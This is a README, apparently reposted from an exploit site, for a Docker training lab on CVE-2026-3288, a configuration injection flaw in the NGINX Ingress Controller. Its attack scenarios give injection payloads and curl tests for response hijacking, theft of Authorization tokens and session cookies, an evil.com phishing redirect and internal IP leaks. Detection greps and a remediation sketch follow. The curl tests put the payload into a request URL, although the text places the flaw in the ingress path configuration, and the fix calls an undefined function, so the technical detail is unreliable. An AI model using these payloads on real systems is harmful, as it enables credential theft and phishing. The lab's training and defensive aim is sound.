Share
## https://sploitus.com/exploit?id=094D062C-6948-50CB-9252-C3D5E27FCA9D
# CVE-2026-3288 Vulnerable Lab (Docker)
## NGINX Ingress Controller Configuration Injection
โ ๏ธ **WARNING**: This lab contains intentionally vulnerable configurations for **AUTHORIZED SECURITY TRAINING ONLY**
## Vulnerability Overview
**CVE-2026-3288** (CVSS 8.8 HIGH) - Configuration injection in NGINX Ingress Controller
- **Affected Versions**: < v1.13.8, v1.14.4, v1.15.0
- **Attack Vector**: Double-quote (`"`) injection in path configuration
- **Impact**: Remote Code Execution, Secret Disclosure, Credential Theft
- **Related**: CVE-2026-24512 (similar path injection)
### Root Cause
The `buildProxyPass()` function does not sanitize path input before interpolating it into nginx configuration, allowing attackers to break out of quoted strings and inject arbitrary nginx directives.
## Lab Components
```
CVE-2026-3288-lab/
โโโ README.md # This file
โโโ docker-compose.yml # Main lab setup
โโโ docker/
โ โโโ nginx/
โ โ โโโ Dockerfile # Vulnerable NGINX setup
โ โ โโโ nginx.conf # Base configuration
โ โ โโโ vulnerable-config.conf # Vulnerable path handling
โ โโโ backend/
โ โโโ Dockerfile # Simple backend app
โ โโโ app.py # Flask application
โโโ exploits/
โ โโโ exploit.py # Automated exploitation script
โ โโโ payloads.txt # Collection of exploit payloads
โ โโโ test-exploits.sh # Test all exploits
โโโ detection/
โ โโโ monitor-logs.sh # Monitor for exploitation attempts
โโโ cleanup/
โโโ cleanup.sh # Remove all lab resources
```
## Prerequisites
- Docker installed
- Docker Compose installed
- Python 3.6+ (for exploitation scripts)
- curl or wget
- 2GB RAM minimum
## Quick Start
### 1. Start the Lab
```bash
cd CVE-2026-3288-lab
# Start vulnerable environment
docker-compose up -d
# Check status
docker-compose ps
```
### 2. Verify Installation
```bash
# Test backend is running
curl http://localhost:8080/
# Test NGINX is running
curl http://localhost/
```
### 3. Run Exploits
```bash
cd exploits
# Automated exploitation
python3 exploit.py --all
# Or test individual exploits
bash test-exploits.sh
```
### 4. Monitor Logs
```bash
# Watch NGINX logs for exploitation
docker-compose logs -f nginx
# Monitor detection
cd detection
bash monitor-logs.sh
```
### 5. Cleanup
```bash
docker-compose down -v
```
## Attack Scenarios
### Scenario 1: Response Hijacking
Inject nginx `return` directive to serve attacker-controlled content.
**Payload:**
```
/api" return 200 "HACKED BY ATTACKER
```
**Test:**
```bash
curl 'http://localhost/api" return 200 "HACKED'
```
### Scenario 2: Credential Theft
Reflect Authorization headers back in response to steal Bearer tokens.
**Payload:**
```
/login" return 200 "Token: $http_authorization
```
**Test:**
```bash
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'
```
### Scenario 3: Phishing Redirect
Redirect users to attacker-controlled phishing site.
**Payload:**
```
/" return 302 "https://evil.com/phishing
```
**Test:**
```bash
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'
```
### Scenario 4: Internal IP Disclosure
Leak internal server information.
**Payload:**
```
/" return 200 "Internal IP: $server_addr
```
**Test:**
```bash
curl 'http://localhost/" return 200 "Internal IP: $server_addr'
```
### Scenario 5: Cookie Theft
Steal session cookies.
**Payload:**
```
/" return 200 "Cookies: $http_cookie
```
**Test:**
```bash
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'
```
## How It Works
### Vulnerable Code Pattern
```nginx
# Vulnerable configuration
location ~ "^/api" {
rewrite "(?i)/api" /backend break;
proxy_pass http://backend;
}
```
### Exploitation
When path contains `"`, it breaks the quoted string:
```nginx
# Attacker input: /api" return 200 "HACKED
# Results in:
location ~ "^/api" return 200 "HACKED" {
# Original config is now broken
}
```
## Detection
### Log Monitoring
```bash
# Watch for suspicious patterns
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'
```
### Manual Detection
```bash
# Check NGINX config for injected directives
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"
```
## Remediation
### Immediate Actions
1. **Input Validation** - Sanitize all path inputs
2. **Escape Special Characters** - Properly escape `"` and `\`
3. **Use Allowlists** - Only permit known-good paths
4. **Monitor Logs** - Alert on suspicious patterns
### Code Fix
```go
// Before (vulnerable)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
// After (fixed)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)
```
## Learning Objectives
After completing this lab, you will understand:
1. โ
How configuration injection vulnerabilities work
2. โ
The impact of insufficient input sanitization
3. โ
Multiple exploitation techniques
4. โ
Detection methods via log analysis
5. โ
Proper remediation strategies
## Troubleshooting
### Containers won't start
```bash
# Check logs
docker-compose logs
# Restart
docker-compose restart
```
### Port already in use
```bash
# Change ports in docker-compose.yml
# Or stop conflicting services
sudo lsof -i :80
```
### Exploits not working
```bash
# Verify NGINX is running
docker-compose ps nginx
# Check NGINX config
docker exec cve-2026-3288-nginx nginx -t
```
## Security Notice
- โ ๏ธ **ONLY** use in isolated lab environments
- โ ๏ธ **NEVER** deploy on production systems
- โ ๏ธ **NEVER** expose to the internet
- โ ๏ธ Ensure proper authorization before testing
- โ ๏ธ Follow responsible disclosure practices
## References
- [CVE-2026-3288 Advisory](https://github.com/kubernetes/ingress-nginx/security/advisories)
- [Fix PR #14667](https://github.com/kubernetes/ingress-nginx/pull/14667)
- [Sysdig Analysis](https://www.sysdig.com/blog/detecting-cve-2026-3288)
---
**Created for authorized security training and research purposes only**